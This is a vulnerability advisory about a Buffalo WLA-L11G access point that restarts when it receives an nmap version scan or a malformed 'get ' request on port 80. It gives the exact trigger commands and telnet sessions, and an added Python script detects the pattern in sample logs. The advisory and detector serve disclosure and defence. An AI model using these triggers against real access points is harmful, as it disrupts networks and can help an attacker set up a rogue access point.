Vulnerable systems:
* WLA-L11G version 2.31 (WLI-PCM-L11G Ver.6.14)
While performing network testing, we found a Buffalo Access Point (WLA-L11G Ver.2.31) vulnerable to a Denial of Service (DoS) attack. Simply using a network scanning tool such as Nmap (www.insecure.org) with version detection enabled, in the following manner, restarts the AP:
$ nmap -sVVV -p 80 192.168.177.250
Where 192.168.177.250 is the IP address of the Buffalo AP. Analyzing the network traffic shows the following:
The attack can also be reproduced manually via telnet:
andrei@192.168.177.7:~$ telnet 192.168.177.250 80
Trying 192.168.177.250...
Connected to 192.168.177.250 (192.168.177.250).
Escape character is '^]'.
GET / HTTP/1.0
Connection closed by foreign host.
And
andrei@192.168.177.7:~$ telnet 192.168.177.250 80
Trying 192.168.177.250...
Connected to 192.168.177.250 (192.168.177.250).
Escape character is '^]'.
get
Connection closed by foreign host.
(Note that there is a <space> after "get"; without the <space>, the AP does not restart.)
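The two request lines above ("GET / HTTP/1.0" from a scanner, and a bare lowercase "get " followed by a space) are all an operator has to look for to notice this trigger in traffic to the AP's port 80. The following is an added example, not part of the Arhont advisory and not Buffalo's code: it runs two detection rules over constructed connection-log lines (the log format, the management host 192.168.177.7 and the date stamps are assumptions; the AP address is the one used in the advisory). Rule one flags any HTTP request to the AP from a host that is not the designated management host, which mirrors the obvious mitigation of firewalling the AP's web interface; rule two flags request lines that are not well-formed "METHOD path HTTP/1.x" lines, which catches the "get " variant.

```python
"""Detect the request pattern from the advisory in connection logs.

Constructed log format (an assumption, not the AP's own logging):
    "<timestamp> <src_ip> <dst_ip>:<dst_port> <request line>"
"""
import ipaddress
import re
from dataclasses import dataclass

AP_ADDRESS = "192.168.177.250"    # AP address used in the advisory
AP_HTTP_PORT = 80
# Assumption: only this host may manage the AP over HTTP.
MANAGEMENT_HOSTS = {ipaddress.ip_address("192.168.177.7")}

# A well-formed request line: uppercase method, a target, an HTTP/1.x version.
REQUEST_LINE = re.compile(r"^(GET|HEAD|POST) \S+ HTTP/1\.[01]$")

# Constructed sample log lines for demonstration (not real captures).
SAMPLE_LOG_LINES = [
    "2000-01-01T10:00:01 192.168.177.7 192.168.177.250:80 GET /index.html HTTP/1.1",
    "2000-01-01T10:00:05 192.168.177.42 192.168.177.250:80 GET / HTTP/1.0",
    "2000-01-01T10:00:09 192.168.177.42 192.168.177.250:80 get ",   # bare 'get ' as in the advisory
    "2000-01-01T10:00:12 192.168.177.7 192.168.177.250:80 get ",    # same line, from the admin host
    "2000-01-01T10:00:20 192.168.177.42 192.168.177.250:22 SSH-2.0-OpenSSH",  # not HTTP, ignored
]


@dataclass
class Alert:
    timestamp: str
    src: str
    request: str
    reasons: tuple  # one or more of the reason strings below


def is_well_formed_request_line(line):
    """True for 'GET / HTTP/1.0'-style lines, False for 'get ' or 'get'."""
    return REQUEST_LINE.match(line) is not None


def analyze(log_lines):
    """Return one Alert per suspicious HTTP request sent to the AP."""
    alerts = []
    for raw in log_lines:
        if not raw.strip():
            continue
        parts = raw.split(" ", 3)           # keep the request line intact (trailing space included)
        if len(parts) < 4:
            continue                        # no request line at all: not an HTTP record
        timestamp, src, dst, request = parts
        dst_ip, dst_port = dst.rsplit(":", 1)
        if dst_ip != AP_ADDRESS or int(dst_port) != AP_HTTP_PORT:
            continue                        # only traffic to the AP's web interface matters here

        reasons = []
        if ipaddress.ip_address(src) not in MANAGEMENT_HOSTS:
            reasons.append("unauthorized-source")
        if not is_well_formed_request_line(request):
            reasons.append("malformed-request-line")
        if reasons:
            alerts.append(Alert(timestamp, src, request, tuple(reasons)))
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG_LINES):
        print(f"{alert.timestamp} {alert.src} {alert.request!r}: {', '.join(alert.reasons)}")
```

On the sample above the first line (a normal request from the management host) produces nothing, the scanner-style "GET / HTTP/1.0" from a non-management host is flagged for its source only, the "get " from that host is flagged for both source and form, and the "get " from the management host is flagged for form only. The unauthorized-source rule is the one to act on first: if the AP's port 80 is reachable only from the management host, the restart can no longer be triggered by arbitrary clients.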
Impact:
This vulnerability can be exploited by an attacker to restart the AP. This might be useful to the attacker if the configuration files have been changed and the AP must be restarted for the changes to take effect. It is also possible to use this attack to spoof an AP and make clients connect to a rogue or spoofed AP instead of the legitimate one.
Vendor response:
According to the Arhont Ltd. policy, all found vulnerabilities and security issues will be reported to the manufacturer 7 days before release to the public domain (such as CERT and BUGTRAQ).
If you would like to get more information about this issue, please do not hesitate to contact Arhont team.